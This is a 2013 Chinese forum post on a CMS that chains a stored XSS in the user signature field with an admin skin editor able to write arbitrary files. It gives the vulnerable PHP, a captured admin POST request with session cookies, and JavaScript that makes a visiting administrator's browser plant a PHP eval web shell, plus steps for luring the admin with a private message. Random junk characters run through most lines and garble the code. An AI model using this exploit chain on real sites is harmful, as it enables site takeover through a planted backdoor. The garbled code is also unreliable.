|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
- R2 I/ M# H2 i! o) S( Y官网已经修补了,所以重新下了源码4 {* p/ i4 l, o$ e. l
因为 后台登入 还需要认证码 所以 注入就没看了。
* w4 f/ K5 I+ S& {% j; s0 G- q存在 xss
& w' l+ H- Z; a* K5 ^. u: |" j漏洞文件 user/member/skin_edit.php1 s Z% p& f: U1 P* T; G
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:& J8 W+ j; m; i2 K8 E/ S t" @
1 r2 U% p8 n1 a9 N4 w</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>7 d) V# a- X& O6 p* x! R0 U
: P% p' h) g- v2 v5 }$ Q. F
</textarea></td></tr>( [ x2 h2 ~$ ^4 t
9 z b2 d+ i9 o: @
user/do.php 9 V1 w5 ?* O8 ^2 S
1 h6 F: U, Q+ |1 C8 e( }: P, e4 r- |% o0 z3 K$ p& R+ ?6 F5 s: ~# O
if($op=='zl'){ //资料; N! P2 t. B7 k3 o
- a" b+ Q: Q: I ]6 L if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
" y/ P! ^% ~) ?: t exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));8 J4 H1 ~1 ?1 n7 B/ J
, v7 D/ W. @2 x" h0 `8 k% |
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
( C0 z) w+ w) C8 h3 j+ c! ~5 [, F+ `# x ' m+ Z/ C4 e1 W- H) a
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."') I/ D0 O- z# {
where CS_Name='".$cscms_name."'";
- D, i: z( x: _% Q5 m) X" D7 H: t 0 U# ?# f F/ S9 B
if($db->query($sql)){
" J8 k* Z5 l, q, w. M- { $ k* W D5 t: d6 b. `
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));8 W- }& a7 E, ]/ `: ^" f/ J, C
7 r( E5 O+ r4 ~! D }else{
: H7 Y& ]% T, V1 y( {! Q* e2 o+ S / G' a2 m1 I9 }+ T5 s! f
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));" x; F9 ?! h# {5 Q
' {) i" M2 d5 w6 V Q, j% m }
' P% U8 _0 W% ?0 {6 |: R. ?8 t
8 T! }, M' j1 d" E3 K% a% A6 X( T [- M Z, p" t
没有 过滤导致xss产生。$ U. n! A7 f1 Z: n
后台 看了下 很奇葩的是可以写任意格式文件。。( Q1 e0 j2 x' j1 W2 W3 Y! |
抓包。。
: T- b: \, a/ v6 ^+ {' ~2 p4 {6 v: q2 i
- v& R+ Y3 f1 |5 n+ [本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1. E1 c" D( J! i+ T# h% Z
* E7 Z9 p5 B" b% `, I: T) D; kAccept: text/html, application/xhtml+xml, */*
+ i4 v$ r# s# X) \- L$ D3 W* Q 2 K+ \8 s2 q# g- ?0 t7 S
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php' U' f. w% t; r$ t3 n
; {, @4 ]7 h; A3 ?5 W- oAccept-Language: zh-CN
) W! }3 }- Z u( U
2 Q& R w+ Z% xUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 O/ W3 D; T' m$ s. K$ Z3 g8 N
- ~. |* o$ y8 H) @( F
Content-Type: application/x-www-form-urlencoded
7 W, T: A. h4 e- i( a4 N$ O) X
5 u" N8 L8 m5 \6 s4 c- g, ~Accept-Encoding: gzip, deflate, V; a+ b) `; k6 H. q
% Z" ]0 s% S1 u# A4 k) IHost: 127.0.0.1
* \' N1 i- m4 L3 E* s5 r , s$ g4 [6 Q; W+ H
Content-Length: 38/ n" d% ?" \2 Y& K% T; L: I0 z
# r8 T5 Z; F! W+ Z% X+ ~
DNT: 1
6 }% j' m4 I, B 1 U! a7 O6 k# G5 }( l& m
Connection: Keep-Alive
3 E# } ?: y' b8 w8 t# J 6 M+ G+ R3 ~# A9 k0 v8 ~
Cache-Control: no-cache: X4 j' i5 e2 |( }! B/ n
2 Q9 P+ d z8 n& g6 V
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
! ^9 p7 y: V" M9 q1 p! I/ h ! X# w3 d2 k6 f; q4 c
/ Z0 N, O% t# N2 Z9 e2 l
name=aaa.php&content=%3Cs%3E%3Ca%25%3E5 i1 c( @1 j: t5 h. o
4 f4 `( o8 G& S& {& A5 {
' _- R% u V7 o d4 p% r2 m& c4 o
- @' ], X% T% x3 g* \$ Y
于是 构造js如下。" X& |2 g- e, a
3 j" g2 {& H3 p+ f0 [本帖隐藏的内容<script>
4 n \4 o7 Q) f; DthisTHost = top.location.hostname;
# s c; {5 K- S6 o+ g2 o
& u- n! n n: ~* A% GthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
1 L( O9 `! Q6 M% F! e8 S$ u $ v" k' p9 X, T5 i. \
function PostSubmit(url, data, msg) { 5 x0 g4 u" Z+ I. e+ E
var postUrl = url;
8 q* J& `' [! m4 J' l6 Q( S W ( w3 v- ^( r( Y' Y4 h0 ~
var postData = data; 5 \; j6 v2 A2 T/ [/ b j
var msgData = msg;
& q5 B$ C' `' W6 F# a9 V; G: K var ExportForm = document.createElement("FORM");
+ e0 G9 b4 B5 I( |* H/ ?0 g document.body.appendChild(ExportForm); , z) o! W0 P0 T1 p
ExportForm.method = "POST"; 6 l2 I- f- |) ^ x' P3 P
var newElement = document.createElement("input");
2 a1 h. e! l( A- V5 c newElement.setAttribute("name", "name"); 2 P/ e/ N ^" x- R% z! C. c5 A
newElement.setAttribute("type", "hidden"); # r4 l/ B8 @$ } P- t! }2 w; R- B* n
var newElement2 = document.createElement("input"); 7 g6 U$ g# @0 ~8 ~* c4 k
newElement2.setAttribute("name", "content"); ! s/ d' f& u) q4 v/ K
newElement2.setAttribute("type", "hidden"); 3 W3 R5 d! J, [; f- T& I
ExportForm.appendChild(newElement);
8 O$ ?5 B5 C/ d ExportForm.appendChild(newElement2); / z* c) D- |7 V
newElement.value = postData;
4 Y; c9 K. b; L1 I! ]' h% m" e newElement2.value = msgData; + C$ V b: Q) d- e+ z* c
ExportForm.action = postUrl;
, b6 j% X4 D w; h% T9 Y ExportForm.submit(); 9 [' j( Q; U9 X1 u2 q
};) P/ H# l% ^' z; z g1 M5 g/ Z: B
8 |9 |9 y( Y8 n _! KPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");, J1 |$ Z2 D% Y; z9 R/ F6 @
$ q) m1 G+ z( Q( _</script># h( X# w) y; D" Q! U. _( {
, t U: u1 g; g0 _- s" m% t2 s* n1 o$ l
% O( }' X: e, _/ E/ F8 U2 y2 Chttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入# w7 x0 i. L8 N7 ~; [! Y
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)2 f) a+ i9 e9 Z! b. ]$ P
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
# q2 f5 \, N8 M( U" U |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对